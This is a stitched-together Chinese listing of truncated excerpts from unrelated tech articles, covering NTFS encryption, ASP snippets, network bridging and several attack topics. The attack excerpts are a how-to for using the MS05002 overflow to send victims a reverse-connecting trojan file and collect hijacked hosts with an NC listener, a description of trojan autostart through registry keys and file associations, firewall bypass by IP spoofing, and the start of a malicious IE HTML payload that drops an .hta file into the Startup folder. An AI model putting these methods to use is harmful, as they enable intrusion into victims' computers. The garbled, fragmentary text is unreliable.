NTFS是WinNT以上版本支持的一种提供安全性、可靠性的高级文件系统。在Win2000和WinXP中，NTFS还可以提供诸如文件和文件夹权限、加密、磁盘配额和压缩这样的高级功能。　　一、加密文件或文件夹　　步骤一：打开Windows资源管理器。　　步骤二：右键单击要加密的文件或文件夹，然后单击“属性”。　　步骤三：在“常规”选项卡上，单击“高级”。选中“加密内容以便保护数据”复选框　在加密过程中还要注意以下五点：　　1.要打开“Windows资源管理器”，请单击“开始→程序→附件”，然后单击“Windows资源管理器”。　　2.只可以加密NTFS分区卷上的文件和文件夹，FAT分区卷上的文件和...

如今各种使用AJAX技术的站点都实现了DragandDrop(拖动)效果，利用Dojo框架也可以很方便的实现，相比较其它框架，代码更少，且对浏览器的兼容性支持比较好。　　先看一下效果，以下是51AJAX.com站点首页的效果，其中各个模块是可以任意拖动的：　　screen.width*0.7){this.resized=true;this.width=screen.width*0.7;this.style.cursor='hand';this.alt='Clickheretoopennewwindow\nCTRL+Mousewheeltozoomin/out';}"onclick="if(!t...

       木马对文件关联的利用 　　我们知道，在注册表HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersionRun下可以加载程序，使之开机时自动运行，类似“Run”这样的子键在注册表中还有几处，均以“Run”开头，如RunOnce、RunServices等。除了这种方法，还有一种修改注册表的方法也可以使程序自启动。　　具体说来，就是更改文件的打开方式，这样就可以使程序跟随您打开的那种文件类型一起启动。举例来...

溢出攻击永远是安全界中，不可忽视的角色。而如今也正是肉鸡短缺的年代，能掌握一门最新的Ms05002溢出，必定会让你有“惊人”的收获。至于熟练的溢出如何炼成?具体方法请见下文所示!　　实施方法：通过Ms05002攻击工具，溢出反弹IP、反弹端口，会生成含有木马性质的文件。然后将这个产生的文件，以QQ传输的形式发给受害者观看，或者将其上传到自己的主页空间，引诱其他人访问。最后执行NC瑞士军刀，监听本机端口，收取已经运行产生文件的主机。　　步骤1．首先从网上下载Ms05002溢出工具，释放到比较理想的硬盘驱动器中，然后在CMD命令行下，输入软件名称启动该程序，会出现一些英文形式的帮助信息(如图1)。...

quote.asp<%SetMyFileObj=Server.CreateObject("Scripting.FileSystemObject")SetMyTextFile=MyFileObj.OpenTextFile("c:\quote.txt")'设置好路径.IFNOTMyTextFile.AtEndOfStreamTHENheader=CInt(MyTextFile.ReadLine)'读表头.ENDIFRANDOMIZE'生成基于表头的随机数,RANDOMIZE语句对确保一个随机数非常重要.RandomValue=INT(header*RND)+1Count=0'循环直到行号等于...

如何利用数据库内容建立一个下拉式列表？<%myDSN="DSN=xur;uid=xur;pwd=xur"mySQL="select*fromauthorswhereAU_ID<100"setconntemp=server.createobject("adodb.connection")conntemp.openmyDSNsetrstemp=conntemp.execute(mySQL)ifrstemp.eofthenresponse.write"噢,数据库为空!"response.writemySQLconntemp.closesetconntemp=nothingresponse...

　　在网上看到一篇利用WindowsXP网桥功能实现无线上网的文章，个人观点认为，无线上网固然有其独特的优点，但就现阶段的状态来看，有线网络还是在传输速度、传输质量以及价格方面有着无线网络无法比拟的优势，因而在此介绍网桥功能实现有线上网，希望能够与大家一起交流心得。　　在这里我们以多台计算机共用一条ADSL上网为例，介绍整个的连接过程，当然基于无线连接、拨号的连接也能够实现，但在这里就有线上网的具体配置实现过程进行说明。　　如图1所示是实现多台计算机同时上网的网络结构，这个结构和Wingate等软件上网的结构类似，但基于是系统本身所提供的功能，所以我认为各方面都要比软件实现要实用、更方便。图1...

   一般的访问控制主要在防火墙中进行设置，制定一些安全策略：如内部局域网的资源不允许外部网上的用户使用；不设防区(又称非军事区)可以为内部或外部局域网，其中的资源允许外部网的用户有限度地使用；可以使外部用户访问非军事区（DMZ区）的WEB服务器等等。深入分析研究防火墙技术，利用防火墙配置和实现的漏洞，可以对它实施攻击。通常情况下，有效的攻击都是从相关的子网进行的，因为这些网址得到了防火墙的信赖，虽说成功与否尚取决于机遇等其他因素，但对攻击者而言很值得一试。　　   突破防火墙系统最常用的方法是IP地址欺骗，它同时也是其他一系列攻击方...

本地文件上传到服务器后，服务器的脚本对文件进行保存，一般有两种方式，一种是作为文件保存到机器的特定目录下，但是这里就有很多诸如文件重名带来的种种不便之处，有的程序自动改文件名字，把名字加上上传时间等方法以保证文件名的唯一性，这样失去了文件的原始名字，通过文件名查询特定的文件信息也有很多困难，不利于文件的统一管理；一种是把文件保存到数据库中利用数据库的强大功能，可以方便的实现文件的各种操作。本文采用的是第二种方法。    这一组程序演示了，如何将硬盘的一个文件通过网页，上传到服务器的数据库里面，并且读出文件的内容。使用说明：一共有5个程序,说明如下：1.f...

   这是利用微软( Microsoft )的IE浏览器( Internet Explorer )所衍生出来的 攻击方法。 以下这段就是具有破坏性的HTML Hacking Your Computer . scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta"; scr.Doc=" wsh.Run(’start.exe&...

[原创]ASP小偷程序如何利用XMLHTTP实现表单的提交以及cookies或session的发送利用XMLHTTP来制作小偷的具体细节落伍很多人都发过和讨论过了，但是在制作ASP小偷的过程中，很多人就发现ASP小偷不如PHP小偷的那么强大了。确实，如果在原网站如果存在表单提交或cookies的验证，对于ASP来说，不使用基于SOCKET的组件就难以完成，其实，XMLHTTP的另外两个方法被我们忽略了，而这正是问题的关键。下面首先来说说这个方法1。.send()由于流行的小偷是使用的GET而不是POST来传送数据，所以很多人忽略了这个方法，而使用SEND发送数据也很简单，就是SEND("内容"...